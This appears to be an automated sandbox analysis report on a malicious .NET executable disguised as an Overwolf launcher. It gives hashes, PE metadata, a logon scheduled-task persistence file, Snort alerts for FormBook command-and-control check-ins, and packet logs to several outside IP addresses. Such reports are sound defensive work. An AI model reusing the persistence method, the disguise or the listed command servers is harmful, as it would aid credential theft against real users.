                                                                              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                                              C:\Users\user\AppData\Roaming\zLIpEDZOH.exe
                                                                              Process:C:\Users\user\Desktop\JAAkR51fQY.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1068544
                                                                              Entropy (8bit):7.432118486633516
                                                                              Encrypted:false
                                                                              SSDEEP:24576:uj+TfsZpecVqHlRL1FQ7xg/KICOyUcPR:uj+76pdVqHvLox6KnPR
                                                                              MD5:1DD3DDA596F5391BB865683FA49B531E
                                                                              SHA1:37EAB36B9CAABC5E1D55086DA5C46BC50B012FCA
                                                                              SHA-256:2ABB16D594F4B36FC8B8AAB8CAB7736350421C619CEC8E12E8975E87F7A99FAA
                                                                              SHA-512:7C0A2E9D893168C64F3BF2F3DEE38261D24DD90BE523D313651CFE9646BB14743A09C319F4D0123FBF0FAE587F269D8FF6F54C369A52F7E4D78F321CEB81C688
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 32%
                                                                              Joe Sandbox View:
                                                                              • Filename: Order_385647584.xlsx, Detection: malicious, Browse
                                                                              Reputation:low
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_..............0..B...........a... ........@.. ....................................@.................................la..O.................................................................................... ............... ..H............text....A... ...B.................. ..`.rsrc................D..............@..@.reloc...............L..............@..B.................a......H...........................8..........................................Z...D.;^....,.............../w....).2.N....0...K.,L....8.....Wl......s......~8.R.....T%.......$.Q.>...#..Em*..Q.#.U.].Hx..<~.c*r.+..3.RW_;..Z4..dXu{.....md.9.E.Q..".B..1....'&..nh.Am`n..U...(.@X&.n.D..P ....o..E..c.k..x..".1_....{tb.(....A..7.5\....@......K..b^O>.X..7.....>J..-G6o>............'Y>........2..2..._F!......b...]:n4L..b..5.E]...?*.,:P.........-Hy_..Q.T....*#.G.f-../..,.l.

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):7.432118486633516
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                              File name:JAAkR51fQY.exe
                                                                              File size:1068544
                                                                              MD5:1dd3dda596f5391bb865683fa49b531e
                                                                              SHA1:37eab36b9caabc5e1d55086da5c46bc50b012fca
                                                                              SHA256:2abb16d594f4b36fc8b8aab8cab7736350421c619cec8e12e8975e87f7a99faa
                                                                              SHA512:7c0a2e9d893168c64f3bf2f3dee38261d24dd90be523d313651cfe9646bb14743a09c319f4d0123fbf0fae587f269d8ff6f54c369a52f7e4d78f321ceb81c688
                                                                              SSDEEP:24576:uj+TfsZpecVqHlRL1FQ7xg/KICOyUcPR:uj+76pdVqHvLox6KnPR
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_..............0..B...........a... ........@.. ....................................@................................

                                                                              File Icon

                                                                              Icon Hash:00828e8e8686b000

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x5061be
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                              Time Stamp:0x5FFEC7FB [Wed Jan 13 10:14:19 2021 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:v4.0.30319
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x10616c0x4f.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1080000x618.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x10a0000xc.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x20000x1041c40x104200False0.755391976514data7.4388891588IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                              .rsrc0x1080000x6180x800False0.33349609375data3.49648060451IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0x10a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountry
                                                                              RT_VERSION0x1080a00x388data
                                                                              RT_MANIFEST0x1084280x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                              Imports

                                                                              DLLImport
                                                                              mscoree.dll_CorExeMain

                                                                              Version Infos

                                                                              DescriptionData
                                                                              Translation0x0000 0x04b0
                                                                              LegalCopyrightCopyright Overwolf 2011 - 2020
                                                                              Assembly Version2.159.0.0
                                                                              InternalNamev.exe
                                                                              FileVersion2.159.0.0
                                                                              CompanyNameOverwolf Ltd.
                                                                              LegalTrademarks
                                                                              CommentsOverwolf Launcher
                                                                              ProductNameOverwolfLauncher
                                                                              ProductVersion2.159.0.0
                                                                              FileDescriptionOverwolfLauncher
                                                                              OriginalFilenamev.exe

                                                                              Network Behavior

                                                                              Snort IDS Alerts

                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                              01/13/21-20:53:31.228176TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.399.83.185.45
                                                                              01/13/21-20:53:31.228176TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.399.83.185.45
                                                                              01/13/21-20:53:31.228176TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.399.83.185.45
                                                                              01/13/21-20:53:36.645584TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.3104.21.13.175
                                                                              01/13/21-20:53:36.645584TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.3104.21.13.175
                                                                              01/13/21-20:53:36.645584TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.3104.21.13.175
                                                                              01/13/21-20:54:23.382964ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                                                              01/13/21-20:54:24.659876ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                                                              01/13/21-20:54:38.955887TCP1201ATTACK-RESPONSES 403 Forbidden804975834.102.136.180192.168.2.3
                                                                              01/13/21-20:54:44.474919TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975980192.168.2.334.102.136.180
                                                                              01/13/21-20:54:44.474919TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975980192.168.2.334.102.136.180
                                                                              01/13/21-20:54:44.474919TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975980192.168.2.334.102.136.180
                                                                              01/13/21-20:54:44.613856TCP1201ATTACK-RESPONSES 403 Forbidden804975934.102.136.180192.168.2.3
                                                                              01/13/21-20:55:04.818825TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.399.83.185.45
                                                                              01/13/21-20:55:04.818825TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.399.83.185.45
                                                                              01/13/21-20:55:04.818825TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.399.83.185.45
                                                                              01/13/21-20:55:10.151085TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976180192.168.2.3104.21.13.175
                                                                              01/13/21-20:55:10.151085TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976180192.168.2.3104.21.13.175
                                                                              01/13/21-20:55:10.151085TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976180192.168.2.3104.21.13.175
                                                                              01/13/21-20:55:56.434267ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 13, 2021 20:53:31.187819004 CET4973680192.168.2.399.83.185.45
                                                                              Jan 13, 2021 20:53:31.227916002 CET804973699.83.185.45192.168.2.3
                                                                              Jan 13, 2021 20:53:31.228027105 CET4973680192.168.2.399.83.185.45
                                                                              Jan 13, 2021 20:53:31.228176117 CET4973680192.168.2.399.83.185.45
                                                                              Jan 13, 2021 20:53:31.271490097 CET804973699.83.185.45192.168.2.3
                                                                              Jan 13, 2021 20:53:31.509026051 CET804973699.83.185.45192.168.2.3
                                                                              Jan 13, 2021 20:53:31.509062052 CET804973699.83.185.45192.168.2.3
                                                                              Jan 13, 2021 20:53:31.509265900 CET4973680192.168.2.399.83.185.45
                                                                              Jan 13, 2021 20:53:31.509509087 CET4973680192.168.2.399.83.185.45
                                                                              Jan 13, 2021 20:53:31.533723116 CET804973699.83.185.45192.168.2.3
                                                                              Jan 13, 2021 20:53:31.533824921 CET4973680192.168.2.399.83.185.45
                                                                              Jan 13, 2021 20:53:31.549463034 CET804973699.83.185.45192.168.2.3
                                                                              Jan 13, 2021 20:53:36.604933977 CET4973780192.168.2.3104.21.13.175
                                                                              Jan 13, 2021 20:53:36.645108938 CET8049737104.21.13.175192.168.2.3
                                                                              Jan 13, 2021 20:53:36.645450115 CET4973780192.168.2.3104.21.13.175
                                                                              Jan 13, 2021 20:53:36.645584106 CET4973780192.168.2.3104.21.13.175
                                                                              Jan 13, 2021 20:53:36.685661077 CET8049737104.21.13.175192.168.2.3
                                                                              Jan 13, 2021 20:53:36.705655098 CET8049737104.21.13.175192.168.2.3
                                                                              Jan 13, 2021 20:53:36.705732107 CET8049737104.21.13.175192.168.2.3
                                                                              Jan 13, 2021 20:53:36.706037998 CET4973780192.168.2.3104.21.13.175
                                                                              Jan 13, 2021 20:53:36.706084967 CET4973780192.168.2.3104.21.13.175
                                                                              Jan 13, 2021 20:53:36.746222973 CET8049737104.21.13.175192.168.2.3
                                                                              Jan 13, 2021 20:53:41.783771038 CET4974180192.168.2.3149.202.23.211
                                                                              Jan 13, 2021 20:53:41.839920044 CET8049741149.202.23.211192.168.2.3
                                                                              Jan 13, 2021 20:53:41.840068102 CET4974180192.168.2.3149.202.23.211
                                                                              Jan 13, 2021 20:53:41.840239048 CET4974180192.168.2.3149.202.23.211
                                                                              Jan 13, 2021 20:53:41.896106958 CET8049741149.202.23.211192.168.2.3
                                                                              Jan 13, 2021 20:53:41.937798977 CET8049741149.202.23.211192.168.2.3
                                                                              Jan 13, 2021 20:53:41.937853098 CET8049741149.202.23.211192.168.2.3
                                                                              Jan 13, 2021 20:53:41.937889099 CET8049741149.202.23.211192.168.2.3
                                                                              Jan 13, 2021 20:53:41.937927008 CET8049741149.202.23.211192.168.2.3
                                                                              Jan 13, 2021 20:53:41.937959909 CET8049741149.202.23.211192.168.2.3
                                                                              Jan 13, 2021 20:53:41.938003063 CET4974180192.168.2.3149.202.23.211
                                                                              Jan 13, 2021 20:53:41.938051939 CET4974180192.168.2.3149.202.23.211
                                                                              Jan 13, 2021 20:53:41.938117981 CET4974180192.168.2.3149.202.23.211
                                                                              Jan 13, 2021 20:53:47.057744980 CET4974780192.168.2.32.57.90.16
                                                                              Jan 13, 2021 20:53:47.117649078 CET80497472.57.90.16192.168.2.3
                                                                              Jan 13, 2021 20:53:47.117738008 CET4974780192.168.2.32.57.90.16
                                                                              Jan 13, 2021 20:53:47.117913008 CET4974780192.168.2.32.57.90.16
                                                                              Jan 13, 2021 20:53:47.177637100 CET80497472.57.90.16192.168.2.3
                                                                              Jan 13, 2021 20:53:47.178179026 CET80497472.57.90.16192.168.2.3
                                                                              Jan 13, 2021 20:53:47.178220987 CET80497472.57.90.16192.168.2.3
                                                                              Jan 13, 2021 20:53:47.178258896 CET80497472.57.90.16192.168.2.3
                                                                              Jan 13, 2021 20:53:47.178297043 CET80497472.57.90.16192.168.2.3
                                                                              Jan 13, 2021 20:53:47.178333998 CET80497472.57.90.16192.168.2.3
                                                                              Jan 13, 2021 20:53:47.178383112 CET80497472.57.90.16192.168.2.3
                                                                              Jan 13, 2021 20:53:47.178385019 CET4974780192.168.2.32.57.90.16
                                                                              Jan 13, 2021 20:53:47.178412914 CET4974780192.168.2.32.57.90.16
                                                                              Jan 13, 2021 20:53:47.178426027 CET80497472.57.90.16192.168.2.3
                                                                              Jan 13, 2021 20:53:47.178463936 CET80497472.57.90.16192.168.2.3
                                                                              Jan 13, 2021 20:53:47.178492069 CET80497472.57.90.16192.168.2.3
                                                                              Jan 13, 2021 20:53:47.178673983 CET4974780192.168.2.32.57.90.16
                                                                              Jan 13, 2021 20:53:47.178684950 CET4974780192.168.2.32.57.90.16
                                                                              Jan 13, 2021 20:53:47.238523960 CET80497472.57.90.16192.168.2.3
                                                                              Jan 13, 2021 20:53:52.260792017 CET4974880192.168.2.345.38.251.204
                                                                              Jan 13, 2021 20:53:52.455332994 CET804974845.38.251.204192.168.2.3
                                                                              Jan 13, 2021 20:53:52.455460072 CET4974880192.168.2.345.38.251.204
                                                                              Jan 13, 2021 20:53:52.455785990 CET4974880192.168.2.345.38.251.204
                                                                              Jan 13, 2021 20:53:52.650135994 CET804974845.38.251.204192.168.2.3
                                                                              Jan 13, 2021 20:53:52.650170088 CET804974845.38.251.204192.168.2.3
                                                                              Jan 13, 2021 20:53:52.650398970 CET4974880192.168.2.345.38.251.204
                                                                              Jan 13, 2021 20:53:52.650476933 CET4974880192.168.2.345.38.251.204
                                                                              Jan 13, 2021 20:53:52.845180035 CET804974845.38.251.204192.168.2.3
                                                                              Jan 13, 2021 20:53:58.028671026 CET4974980192.168.2.323.105.124.225
                                                                              Jan 13, 2021 20:53:58.221483946 CET804974923.105.124.225192.168.2.3
                                                                              Jan 13, 2021 20:53:58.221678019 CET4974980192.168.2.323.105.124.225
                                                                              Jan 13, 2021 20:53:58.221945047 CET4974980192.168.2.323.105.124.225
                                                                              Jan 13, 2021 20:53:58.474133015 CET804974923.105.124.225192.168.2.3
                                                                              Jan 13, 2021 20:53:58.725819111 CET4974980192.168.2.323.105.124.225
                                                                              Jan 13, 2021 20:53:58.974072933 CET804974923.105.124.225192.168.2.3
                                                                              Jan 13, 2021 20:54:09.321840048 CET4975380192.168.2.345.88.202.115
                                                                              Jan 13, 2021 20:54:09.374464989 CET804975345.88.202.115192.168.2.3
                                                                              Jan 13, 2021 20:54:09.374566078 CET4975380192.168.2.345.88.202.115
                                                                              Jan 13, 2021 20:54:09.374722958 CET4975380192.168.2.345.88.202.115
                                                                              Jan 13, 2021 20:54:09.427078962 CET804975345.88.202.115192.168.2.3
                                                                              Jan 13, 2021 20:54:09.427134991 CET804975345.88.202.115192.168.2.3
                                                                              Jan 13, 2021 20:54:09.427155972 CET804975345.88.202.115192.168.2.3
                                                                              Jan 13, 2021 20:54:09.427326918 CET4975380192.168.2.345.88.202.115
                                                                              Jan 13, 2021 20:54:09.427437067 CET4975380192.168.2.345.88.202.115
                                                                              Jan 13, 2021 20:54:09.479727983 CET804975345.88.202.115192.168.2.3
                                                                              Jan 13, 2021 20:54:14.868146896 CET4975480192.168.2.3216.10.246.131
                                                                              Jan 13, 2021 20:54:15.019092083 CET8049754216.10.246.131192.168.2.3
                                                                              Jan 13, 2021 20:54:15.019224882 CET4975480192.168.2.3216.10.246.131
                                                                              Jan 13, 2021 20:54:15.019397020 CET4975480192.168.2.3216.10.246.131
                                                                              Jan 13, 2021 20:54:15.170219898 CET8049754216.10.246.131192.168.2.3
                                                                              Jan 13, 2021 20:54:15.523278952 CET4975480192.168.2.3216.10.246.131
                                                                              Jan 13, 2021 20:54:15.714813948 CET8049754216.10.246.131192.168.2.3
                                                                              Jan 13, 2021 20:54:16.232908964 CET8049754216.10.246.131192.168.2.3
                                                                              Jan 13, 2021 20:54:16.232954979 CET8049754216.10.246.131192.168.2.3
                                                                              Jan 13, 2021 20:54:16.233099937 CET4975480192.168.2.3216.10.246.131
                                                                              Jan 13, 2021 20:54:16.233145952 CET4975480192.168.2.3216.10.246.131
                                                                              Jan 13, 2021 20:54:27.716871023 CET4975580192.168.2.3198.185.159.144
                                                                              Jan 13, 2021 20:54:27.873038054 CET8049755198.185.159.144192.168.2.3
                                                                              Jan 13, 2021 20:54:27.873219013 CET4975580192.168.2.3198.185.159.144
                                                                              Jan 13, 2021 20:54:27.873606920 CET4975580192.168.2.3198.185.159.144
                                                                              Jan 13, 2021 20:54:28.028266907 CET8049755198.185.159.144192.168.2.3
                                                                              Jan 13, 2021 20:54:28.035471916 CET8049755198.185.159.144192.168.2.3
                                                                              Jan 13, 2021 20:54:28.035541058 CET8049755198.185.159.144192.168.2.3
                                                                              Jan 13, 2021 20:54:28.035576105 CET8049755198.185.159.144192.168.2.3
                                                                              Jan 13, 2021 20:54:28.035605907 CET8049755198.185.159.144192.168.2.3

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 13, 2021 20:52:28.775667906 CET6511053192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:52:28.823591948 CET53651108.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:52:29.902426004 CET5836153192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:52:29.950443983 CET53583618.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:52:31.153747082 CET6349253192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:52:31.204767942 CET53634928.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:52:32.556412935 CET6083153192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:52:32.607080936 CET53608318.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:52:33.471796989 CET6010053192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:52:33.522497892 CET53601008.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:52:35.289762020 CET5319553192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:52:35.337785959 CET53531958.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:52:36.092859983 CET5014153192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:52:36.143826962 CET53501418.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:52:37.260704041 CET5302353192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:52:37.308805943 CET53530238.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:52:38.053215981 CET4956353192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:52:38.101409912 CET53495638.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:52:39.243711948 CET5135253192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:52:39.299779892 CET53513528.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:52:40.472771883 CET5934953192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:52:40.520667076 CET53593498.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:52:41.259020090 CET5708453192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:52:41.307003975 CET53570848.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:52:42.429138899 CET5882353192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:52:42.477128983 CET53588238.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:52:55.270946980 CET5872253192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:52:55.271122932 CET5659653192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:52:55.271168947 CET6410153192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:52:55.319129944 CET53641018.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:52:55.319183111 CET53565968.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:52:55.321898937 CET53587228.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:52:55.552265882 CET5756853192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:52:55.600397110 CET53575688.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:53:01.405529022 CET5054053192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:53:01.464633942 CET53505408.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:53:02.938725948 CET5436653192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:53:02.986985922 CET53543668.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:53:03.978550911 CET5303453192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:53:04.043112040 CET53530348.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:53:17.922493935 CET5776253192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:53:17.984271049 CET53577628.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:53:18.823728085 CET5543553192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:53:18.880230904 CET53554358.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:53:27.067092896 CET5071353192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:53:27.126043081 CET53507138.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:53:30.822374105 CET5613253192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:53:31.175664902 CET53561328.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:53:36.528754950 CET5898753192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:53:36.602786064 CET53589878.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:53:39.410540104 CET5657953192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:53:39.458576918 CET53565798.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:53:41.711546898 CET6063353192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:53:41.782303095 CET53606338.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:53:43.293591976 CET6129253192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:53:43.349884987 CET53612928.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:53:46.967202902 CET6361953192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:53:47.055419922 CET53636198.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:53:52.199584961 CET6493853192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:53:52.259721041 CET53649388.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:53:57.671047926 CET6194653192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:53:58.027302980 CET53619468.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:54:01.145373106 CET6491053192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:54:01.201502085 CET53649108.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:54:03.770363092 CET5212353192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:54:04.137646914 CET53521238.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:54:04.657598019 CET5613053192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:54:04.708515882 CET53561308.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:54:05.146895885 CET5633853192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:54:05.203528881 CET53563388.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:54:09.156646013 CET5942053192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:54:09.320578098 CET53594208.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:54:14.434319019 CET5878453192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:54:14.866034985 CET53587848.8.8.8192.168.2.3
                                                                              Jan 13, 2021 20:54:20.562895060 CET6397853192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:54:21.570516109 CET6397853192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:54:22.570830107 CET6397853192.168.2.38.8.8.8
                                                                              Jan 13, 2021 20:54:22.628675938 CET53639788.8.8.8192.168.2.3
